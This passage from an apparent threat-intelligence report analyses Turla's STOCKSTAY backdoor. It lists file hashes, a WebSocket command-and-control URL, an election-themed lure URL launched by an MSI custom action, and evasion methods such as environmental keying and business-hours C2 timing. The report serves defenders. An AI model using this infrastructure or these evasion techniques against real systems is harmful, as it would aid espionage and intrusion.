&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Component&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 7: STOCKSTAY component filenames observed in December 2023&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;apps_libwallets_v1.3.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;81aabf646619ea5f4a72457cd3aa17c5988003d67e6454f45e7cb33613021bac&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;9164054d0bf0b7c8820da4f742860940998984555e65820e4fa8dd07b6bd67ec&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;34fcbe7e90fc87a4f3766469c19a64f24672d7adb99e0198f5ba10d58911368b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;0a545dd1b703cddfb3d582c8c70f65f556bbd580bfa836a387121eb837bda61b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;default.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;2623c6e3c1f5a7b5e735a64813bc0e1382ae45831f5fadffb08c0e7b096627f7&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 8: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;January 2024: Ukraine&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 9: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;February 2024: Italy&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%LOCALAPPDATA%/Programs/SMN/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and enabled persistent execution via registry run keys. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;viewer.exe
https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (&lt;/span&gt;&lt;a href="https://www.circoloesteri.it/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://www.circoloesteri.it/&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Foreign Affairs Club 1936

Approval of the 2023 Financial Statement

Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50

Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig7.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This matches the C2 address used in January 2024.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Copia.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b064a3efb04ed77e6c57955089ce639e193d166c8ea2216c98c3e9b701ea2cff&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;249a4c7cacdd8e99a2a089a5c0ce904f2eff22e0e40fcfb10f7824dca6c51ecb&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b728eba4f0d6d16602fbad05a591f14391594262d3584b2e249e97f86e4dcc5a&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;default.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;40b1208dda0cd5dd95c6b57764b2cfe7145b3ed9457f498408b4aaa05bf3ef50&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 10: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
